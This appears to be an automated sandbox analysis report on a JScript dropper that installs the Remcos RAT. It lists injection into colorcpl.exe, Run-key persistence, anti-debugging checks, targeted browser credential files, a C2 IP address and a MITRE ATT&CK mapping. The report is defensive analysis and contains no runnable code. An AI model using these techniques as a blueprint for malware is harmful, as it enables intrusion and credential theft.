Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E1AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_02E1AC43
Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ekbmajrx
Source: C:\Users\user\AppData\Local\Temp\x.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ekbmajrx
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_029064E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_029064E4
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\x.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\Ekbmajrx.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Links\Ekbmajrx.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_02E1A941
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,16_2_0301A941
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 5517
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 4011
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: foregroundWindowGot 1738
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 6.1 %
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4852 Thread sleep count: 156 > 30
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4852 Thread sleep time: -78000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576 Thread sleep count: 5517 > 30
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576 Thread sleep time: -16551000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576 Thread sleep count: 4011 > 30
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1576 Thread sleep time: -12033000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028F52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_028F52F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,8_2_02E090DC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E0B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_02E0B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E1C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,8_2_02E1C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E0B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_02E0B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E4E989 FindFirstFileExA,8_2_02E4E989
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E07EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,8_2_02E07EDD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E06F13 FindFirstFileW,FindNextFileW,8_2_02E06F13
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E19CEE FindFirstFileW,FindNextFileW,FindNextFileW,8_2_02E19CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E08CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,8_2_02E08CDE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_030090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,16_2_030090DC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0301C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,16_2_0301C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0300B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0300B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0304E989 FindFirstFileExA,16_2_0304E989
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0300B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0300B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_03006F13 FindFirstFileW,FindNextFileW,16_2_03006F13
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_03007EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,16_2_03007EDD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_03008CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,16_2_03008CDE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_03019CEE FindFirstFileW,FindNextFileW,FindNextFileW,16_2_03019CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E07357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_02E07357
Source: Ekbmajrx.PIF, 00000012.00000002.1423292537.00000000006A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: wscript.exe, 00000001.00000002.1239732010.0000024EFAF3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}E
Source: x.exe, 00000003.00000002.1254201790.0000000000911000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: Ekbmajrx.PIF, 0000000F.00000002.1342950778.00000000008D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node graph_3-63327
Source: C:\Windows\SysWOW64\colorcpl.exe API call chain: ExitProcess graph end node graph_8-48804
Source: C:\Users\user\Links\Ekbmajrx.PIF API call chain: ExitProcess graph end node

Anti Debugging
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_0290A5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,3_2_0290A5B0
Source: C:\Users\user\AppData\Local\Temp\x.exe Process queried: DebugPort
Source: C:\Users\user\Links\Ekbmajrx.PIF Process queried: DebugPort
Source: C:\Users\user\Links\Ekbmajrx.PIF Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E3B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02E3B88D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02903E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,3_2_02903E20
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_029A691D mov eax, dword ptr fs:[00000030h] 3_2_029A691D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02968E64 mov eax, dword ptr fs:[00000030h] 3_2_02968E64
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E438F4 mov eax, dword ptr fs:[00000030h] 8_2_02E438F4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_030438F4 mov eax, dword ptr fs:[00000030h] 16_2_030438F4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E11999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,8_2_02E11999
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E35398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_02E35398
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E3B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02E3B88D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E34F01 SetUnhandledExceptionFilter,8_2_02E34F01
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E34D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02E34D6E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_03035398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_03035398
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0303B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0303B88D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_03034F01 SetUnhandledExceptionFilter,16_2_03034F01
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_03034D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_03034D6E

HIPS / PFW / Operating System Protection Evasion
Source: C:\Windows\System32\wscript.exe File created: x.exe.1.dr
Source: C:\Users\user\Links\Ekbmajrx.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Links\Ekbmajrx.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E00000 protect: page execute and read and write
Source: C:\Users\user\Links\Ekbmajrx.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3000000 protect: page execute and read and write
Source: C:\Users\user\Links\Ekbmajrx.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2BD0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\x.exe Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E197D9 mouse_event,8_2_02E197D9
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Links\Ekbmajrx.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Links\Ekbmajrx.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager.79:786
Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerer|
Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager.79
Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0Sg
Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager.79:786|GB
Source: colorcpl.exe, 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.dr Binary or memory string: [Program Manager]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_0295A5A4 cpuid 3_2_0295A5A4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_028F54BC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA,3_2_028FA0B8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA,3_2_028FA104
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,3_2_028F55C8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA,8_2_02E0F26B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_02E5220A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,8_2_02E520E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,8_2_02E52097
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,8_2_02E5217D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,8_2_02E5268A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_02E52757
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,8_2_02E4844E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,8_2_02E5245A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_02E52583
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,8_2_02E48937
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_02E51E1F
Source: C:\Users\user\Links\Ekbmajrx.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_029654BC
Source: C:\Users\user\Links\Ekbmajrx.PIF Code function: GetLocaleInfoA,15_2_0296A104
Source: C:\Users\user\Links\Ekbmajrx.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,15_2_029655C7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,16_2_0305220A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA,16_2_0300F26B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,16_2_0305217D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,16_2_03052097
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,16_2_030520E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_03052757
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,16_2_0305268A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_03052583
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW,16_2_0304844E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,16_2_0305245A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,16_2_03048937
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,16_2_03051E1F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028F8B38 GetLocalTime,3_2_028F8B38
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_02909F00 GetUserNameA,3_2_02909F00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02E493AF _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_02E493AF
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_028FB038 GetVersionExA,3_2_028FB038
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information
Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_02E0B59B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 16_2_0300B59B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_02E0B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 8_2_02E0B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 16_2_0300B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 16_2_0300B6B5

Remote Access Functionality
Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2
Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2
Source: C:\Windows\SysWOW64\colorcpl.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2
Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 8_2_02E05091
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 16_2_03005091
MITRE ATT&CK Matrix (the 14-column grid, rebuilt per tactic). Techniques the report flagged carry its count badge in brackets, reproduced as extracted; the other names are the unflagged cells of the same grid.

Reconnaissance: no flagged techniques. Grid: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses.
Resource Development: Scripting [13]. Grid: Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure.
Initial Access: Valid Accounts [1]. Grid: Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise.
Execution: Native API [1], Exploitation for Client Execution [1], Command and Scripting Interpreter [1], Service Execution [2]. Grid: Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell.
Persistence: Scripting [13], DLL Side-Loading [1], Valid Accounts [1], Windows Service [1], Registry Run Keys / Startup Folder [1]. Grid: RC Scripts, Startup Items, Scheduled Task/Job, At, Cron.
Privilege Escalation: DLL Side-Loading [1], Bypass User Account Control [1], Valid Accounts [1], Access Token Manipulation [11], Windows Service [1], Process Injection [312], Registry Run Keys / Startup Folder [1]. Grid: Scheduled Task/Job, At, Cron.
Defense Evasion: Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [3], DLL Side-Loading [1], Bypass User Account Control [1], Masquerading [11], Valid Accounts [1], Virtualization/Sandbox Evasion [2], Access Token Manipulation [11], Process Injection [312]. Grid: Dynamic API Resolution.
Credential Access: OS Credential Dumping [1], Input Capture [211], Credentials In Files [2]. Grid: NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing.
Discovery: System Time Discovery [2], Account Discovery [1], System Service Discovery [1], File and Directory Discovery [3], System Information Discovery [25], Security Software Discovery [231], Virtualization/Sandbox Evasion [2], Process Discovery [2], Application Window Discovery [1], System Owner/User Discovery [1].
Lateral Movement: no flagged techniques. Grid: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot.
Collection: Archive Collected Data [11], Input Capture [211], Clipboard Data [3]. Grid: Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging.
Command and Control: Ingress Tool Transfer [11], Encrypted Channel [2], Non-Standard Port [1], Data Encoding [1], Remote Access Software [1], Application Layer Protocol [1]. Grid: Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols.
Exfiltration: no flagged techniques. Grid: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol.
Impact: System Shutdown/Reboot [1], Defacement [1]. Grid: Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement.
Behavior Graph (ID 1639312, sample 6732832.js, start date 15/03/2025, architecture WINDOWS, score 100)

Legend of the original graph: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, language markers (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), Is malicious, Internet. The number pairs after a process name are its badge counts (created registry values / created files).

6732832.js
  signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
  +-- wscript.exe (started; badges 1 / 2)
  |     dropped: C:\Users\user\AppData\Local\Temp\x.exe, PE32
  |     signatures: Benign windows process drops PE files; JScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage)
  |     +-- x.exe (started; badges 1 / 7)
  |           dropped: C:\Users\user\Links\Ekbmajrx.PIF, PE32
  |           signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Early bird code injection technique detected; 4 other signatures
  |           +-- colorcpl.exe (started; badges 4 / 3)
  |           |     network: 196.251.83.79 (ports 49693, 49696, 49697), SONIC-WirelessZA, Seychelles
  |           |     dropped: C:\ProgramData\remcos\logs.dat, data
  |           |     signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 4 other signatures
